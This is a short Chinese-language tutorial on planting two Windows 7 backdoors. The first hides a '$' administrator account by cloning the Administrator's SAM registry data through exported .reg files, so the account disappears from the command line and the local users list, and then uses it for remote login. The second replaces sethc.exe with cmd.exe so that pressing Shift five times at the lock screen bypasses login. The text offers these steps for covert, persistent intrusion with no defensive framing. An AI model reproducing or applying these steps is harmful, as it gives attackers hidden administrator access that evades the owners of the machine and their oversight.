一、创建隐藏用户
1、先查看win7当前的用户并创建一个普通用户
//查看用户net user
//创建用户net user 用户名 密码 /add
2、建隐藏用户并查看所有用户(可以看出命令执行成功,隐藏用户不会在命令行显示,可以在本地用户组查看)
//创建隐藏用户 net user kk$ 123 /add
3、一些谨慎的人也会查看本地用户组,从而会发现陌生的用户,所以我们得进一步隐藏;
//这里首先要把隐藏用户加入管理员组
//加入管理员组命令 net localgroup administrators kk$ /add
//注意这里隐藏用加入管理员组命令行还是看不到,在【计算机管理】-【本地用户和组】-【组】-【Administrators】查看;
4、下面就来介绍怎么在此界面隐藏
//打开注册表win+r输入 regedit
【HKEY_LOCAL_MACHINE】-【SAM】-【SAM】-【权限】
5、在此位置
//隐藏用户的类型为0x3f0;对应隐藏用户的信息文件夹是000003EF(导出administratorde文件同理)
//导出这两个文件和Administratorde所在的文件到导出
//桌面查看对应保存的文件
admin.reg是administrator对应的user信息。
k.reg 是hack$对应的user信息。
kk$.reg是hack$对应的names信息。
6、在命令行删除kk$用户
//命令net user kk$ /delete
7、现在注册表、本地用户组都看不到隐藏用户kk$
8、打开桌面将Administrator所在权限注册的用户信息表处替换到建隐藏用户kk$。
F表示用户信息。
V表示权限信息。
9、接着我们使用编辑好的文件导入注册表(双击运行)
//导入k.reg kk$.reg
10、查看用户信息
//此时发现命令行、本地用户组都没有kk$隐藏用户信息,但是注册表里会显示
11、此时计算机是禁用此隐藏用户kk$,我们得在命令行启用kk$用户
12、远程登陆成功(账户kk$ 密码123)
二、shift后门
1、 Windows\System32下的文件权限拿下。
//打开命令行界面,输入命令
// cd C:\windows\system32
// attrib -s -r -h sethc.exe
// copy cmd.exe sethc.exey #将cmd.exe文件复制到sethc.exe中
2.win+L,息屏后连按五次Shift,绕过登录